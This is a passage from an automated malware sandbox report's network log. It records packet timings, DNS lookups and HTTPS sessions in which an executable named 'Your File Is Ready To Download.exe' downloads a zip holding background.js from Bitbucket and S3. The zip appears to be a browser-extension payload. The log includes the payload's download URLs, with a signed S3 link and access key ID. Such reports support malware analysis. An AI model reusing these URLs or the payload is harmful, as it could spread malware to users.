Dec 6, 2021 19:08:58.706845045 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706872940 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706904888 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706937075 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708009005 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708033085 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708050966 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708069086 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708087921 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708105087 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708121061 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708138943 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708156109 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708173990 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708189964 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708209991 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708226919 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708245039 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708261013 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.708277941 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709247112 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709269047 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709286928 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709304094 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709321022 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709340096 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709357023 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709369898 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709386110 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709403992 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709422112 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709439039 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709456921 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709491014 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709631920 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.709646940 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709690094 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709707975 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709723949 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709742069 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709757090 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.709922075 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.710144997 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.710383892 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.710639000 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.710870028 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.711112022 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.711354971 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.720952988 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.745229006 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:09:13.551179886 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:09:13.575463057 CET	443	53617	142.250.186.65	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 6, 2021 19:08:32.669466019 CET	192.168.2.3	8.8.8.8	0xbbf6	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:33.583690882 CET	192.168.2.3	8.8.8.8	0x5018	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:51.778985023 CET	192.168.2.3	8.8.8.8	0x1995	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:51.790374041 CET	192.168.2.3	8.8.8.8	0xd135	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:51.794327021 CET	192.168.2.3	8.8.8.8	0xb648	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:56.408777952 CET	192.168.2.3	8.8.8.8	0x4a8a	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 6, 2021 19:08:32.689768076 CET	8.8.8.8	192.168.2.3	0xbbf6	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:33.603542089 CET	8.8.8.8	192.168.2.3	0x5018	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Dec 6, 2021 19:08:33.603542089 CET	8.8.8.8	192.168.2.3	0x5018	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Dec 6, 2021 19:08:33.603542089 CET	8.8.8.8	192.168.2.3	0x5018	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.81.204	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:51.814053059 CET	8.8.8.8	192.168.2.3	0xb648	No error (0)	accounts.google.com		142.250.185.109	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:51.819608927 CET	8.8.8.8	192.168.2.3	0x1995	No error (0)	www.google.com		142.250.181.228	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:51.831160069 CET	8.8.8.8	192.168.2.3	0xd135	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)
Dec 6, 2021 19:08:51.831160069 CET	8.8.8.8	192.168.2.3	0xd135	No error (0)	clients.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)
Dec 6, 2021 19:08:56.437242031 CET	8.8.8.8	192.168.2.3	0x4a8a	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 6, 2021 19:08:56.437242031 CET	8.8.8.8	192.168.2.3	0x4a8a	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.65	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bitbucket.org

bbuseruploads.s3.amazonaws.com

clients2.google.com

accounts.google.com

www.google.com

clients2.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49711	104.192.141.1	443	C:\Users\user\Desktop\Your File Is Ready To Download.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:33 UTC	0	OUT	GET /betadevmode/devmode/downloads/block-floc.zip HTTP/1.1 User-Agent: AutoHotkey Host: bitbucket.org Cache-Control: no-cache
2021-12-06 18:08:33 UTC	0	IN	HTTP/1.1 302 Found Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; connect-src bitbucket.org .bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self' Server: nginx X-Usage-Quota-Remaining: 999213.419 Vary: Accept-Language, Origin X-Usage-Request-Cost: 797.73 Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Content-Type: text/html; charset=utf-8 X-B3-TraceId: a5fcaf1ed03691d1 X-Usage-Output-Ops: 0 X-Dc-Location: Micros Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Mon, 06 Dec 2021 18:08:33 GMT X-Usage-User-Time: 0.018978 X-Usage-System-Time: 0.004954 Location: https://bbuseruploads.s3.amazonaws.com/6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-4a66-96dc-87848f4069e6/block-floc.zip?Signature=yNzbjFoBEb%2FlfvIrh1KoR48D0Kg%3D&Expires=1638815130&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR&response-content-disposition=attachment%3B%20filename%3D%22block-floc.zip%22 X-Served-By: b120c96c2b2f Expires: Mon, 06 Dec 2021 18:08:33 GMT Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Static-Version: e21921a9fa09 X-Render-Time: 0.0378558635712 Connection: close X-Usage-Input-Ops: 0 X-Request-Count: 2405 X-Frame-Options: SAMEORIGIN X-Version: e21921a9fa09 X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49712	52.217.81.204	443	C:\Users\user\Desktop\Your File Is Ready To Download.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:34 UTC	2	OUT	GET /6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-4a66-96dc-87848f4069e6/block-floc.zip?Signature=yNzbjFoBEb%2FlfvIrh1KoR48D0Kg%3D&Expires=1638815130&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR&response-content-disposition=attachment%3B%20filename%3D%22block-floc.zip%22 HTTP/1.1 User-Agent: AutoHotkey Cache-Control: no-cache Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2021-12-06 18:08:34 UTC	2	IN	HTTP/1.1 200 OK x-amz-id-2: wlPjnHds/AufNOhNm4jyKSdAJfwJhMr76dFmDrmRsY2pyGmyy27vyseDEyhEQZvT0D0NMphkYJg= x-amz-request-id: MPRJH9MBY94HQXBC Date: Mon, 06 Dec 2021 18:08:35 GMT Last-Modified: Thu, 02 Dec 2021 22:35:33 GMT ETag: "fe076363e3ff53fab0b4c0e58fc3cfe3" x-amz-version-id: X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR Content-Disposition: attachment; filename="block-floc.zip" Accept-Ranges: bytes Content-Type: application/x-zip-compressed Server: AmazonS3 Content-Length: 3071 Connection: close
2021-12-06 18:08:34 UTC	3	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 20 7c 82 53 a6 da 03 25 fc 03 00 00 ac 0a 00 00 0d 00 1c 00 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 73 55 54 09 00 03 9b 49 a9 61 1f 4a a9 61 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 9d 56 df 6f e2 38 10 7e e7 af b0 f2 50 92 92 0d ed 9d 74 3a c1 71 d5 6d 85 74 3d 55 d7 15 1c fb 52 55 2b e3 4c 88 af c1 ce d9 0e 5d 84 f2 bf ef 38 bf 09 05 9d ca 03 60 67 66 fc cd cc 37 9f 13 65 82 19 2e 05 d9 80 59 50 11 ca ed 3f f2 15 84 eb 91 c3 80 e0 67 47 15 51 c5 fe 17 29 13 32 23 02 de c8 8a 0b f3 eb 1f 4a d1 bd fb f3 4f de b4 30 64 6a 9f 1a 19 34 61 be d2 24 03 ed b6 be 95 9d 0d 18 c3 77 8c 34 1c 96 3b 91 54 c4 b5 db 1c 37 6f a6 f8 f3 5b e7 c8 20 01 b1 31 f1 94 8c 46 bc 06 65 3f 36 c6 68 d6 31 7c e6 2f 81 91 4b a3 b8 d8 b8 b7 bf 54 c7 e5 Data Ascii: PK \|S%background.jsUTIaJauxVo8~Pt:qmt=URU+L]8`gf7e.YP?gGQ)2#JO0dj4a$w4;T7o[ 1Fe?6h1\|/KT
2021-12-06 18:08:34 UTC	4	IN	Data Raw: 73 ea c5 7a 24 42 de bd 95 36 9c b0 8a 7f a7 e3 61 35 06 bd 45 cc 05 a2 dc df d6 ce e4 4f 33 48 5a 59 67 57 b4 f7 a3 dc 86 27 25 8c eb f2 f6 55 6c 3a 2f d6 bb e9 73 d2 ff 43 fd ce 3b 3e cc e8 3c b7 a4 e0 a3 20 c7 aa b8 45 0f ed 84 cc dc be dd b5 5e 54 78 31 60 67 e9 91 73 31 93 12 1e dd e7 33 9b 6a ac b6 2f 77 c3 b6 0d ef 2f f1 46 ed 35 dc 1f 9c 10 be c3 7b ae 96 65 ce 29 8d 55 8b 56 dc 79 f1 c5 39 6d e9 e9 97 9c 27 26 3d dc be 35 ea 72 ce da 65 0d 52 46 de 57 ca 27 71 56 ee 6f fd 3b 47 82 7f ca cf 25 13 92 b5 1a 15 3b 52 f6 b4 4f 0f 11 52 ed ae 94 89 f9 78 b0 a0 d0 d3 c0 e0 87 48 fc e3 64 c7 b5 e9 8e 36 3e 06 1a b3 7e 2c 39 d9 fe 48 46 bc ca d1 ef 54 f5 da 05 f6 22 1f 6f 8b 4a 32 e6 fd f3 75 d8 cf ba 7e 89 a5 c3 ad 86 95 4d 25 57 5d cf 48 b3 71 28 df bb Data Ascii: sz$B6a5EO3HZYgW'%Ul:/sC;>< E^Tx1`gs13j/w/F5{e)UVy9m'&=5reRFW'qVo;G%;RORxHd6>~,9HFT"oJ2u~M%W]Hq(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49716	142.250.186.78	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:52 UTC	6	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm X-Goog-Update-Updater: chromecrx-85.0.4183.121 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2021-12-06 18:08:52 UTC	8	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-vxWdqWCGPbcYN7+i4/gAyA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 06 Dec 2021 18:08:52 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5453 X-Daystart: 36532 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-06 18:08:52 UTC	9	IN	Data Raw: 35 31 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 34 35 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 36 35 33 32 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 51e<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5453" elapsed_seconds="36532"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2021-12-06 18:08:52 UTC	9	IN	Data Raw: 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 Data Ascii: mhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><ap
2021-12-06 18:08:52 UTC	10	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49713	142.250.185.109	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:52 UTC	7	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2021-12-06 18:08:52 UTC	7	OUT	Data Raw: 20 Data Ascii:
2021-12-06 18:08:52 UTC	10	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 06 Dec 2021 18:08:52 GMT Strict-Transport-Security: max-age=31536000 Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]} Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp" Content-Security-Policy: script-src 'report-sample' 'nonce-WbK9RjjR/8vIDYdaCgmBkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'nonce-WbK9RjjR/8vIDYdaCgmBkA' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport Cross-Origin-Resource-Policy: cross-origin Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-06 18:08:52 UTC	12	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2021-12-06 18:08:52 UTC	12	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49715	142.250.181.228	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:52 UTC	7	OUT	GET /async/ddljson?async=ntp:1 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49718	142.250.181.228	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:52 UTC	7	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2021-12-06 18:08:52 UTC	13	IN	HTTP/1.1 200 OK Version: 413663202 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 BFCache-Opt-In: unload Content-Disposition: attachment; filename="f.txt" Date: Mon, 06 Dec 2021 18:08:52 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: CONSENT=PENDING+151; expires=Wed, 06-Dec-2023 18:08:52 GMT; path=/; domain=.google.com; Secure P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Expires: Mon, 06 Dec 2021 18:08:52 GMT Connection: close Transfer-Encoding: chunked
2021-12-06 18:08:52 UTC	13	IN	Data Raw: 34 35 62 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 43 48 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 70 61 20 67 62 5f 56 61 20 67 62 5f 4c 65 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 Data Ascii: 45bd)]}'{"update":{"language_code":"en-CH","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_pa gb_Va gb_Le\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003c
2021-12-06 18:08:52 UTC	14	IN	Data Raw: 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 33 20 31 38 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 35 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 37 76 32 68 31 38 56 36 48 33 7a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 70 61 74 68 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 Data Ascii: e\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e
2021-12-06 18:08:52 UTC	15	IN	Data Raw: 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 5a 63 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 64 20 67 62 5f 50 64 20 67 62 5f 4c 64 20 67 62 5f 49 65 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 64 20 67 62 5f 53 61 20 67 62 5f 45 64 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 75 70 5c 75 30 30 33 64 5c 22 Data Ascii: ass\u003d\"gb_Zc\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Ed gb_Pd gb_Ld gb_Ie\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Qd gb_Sa gb_Ed\" 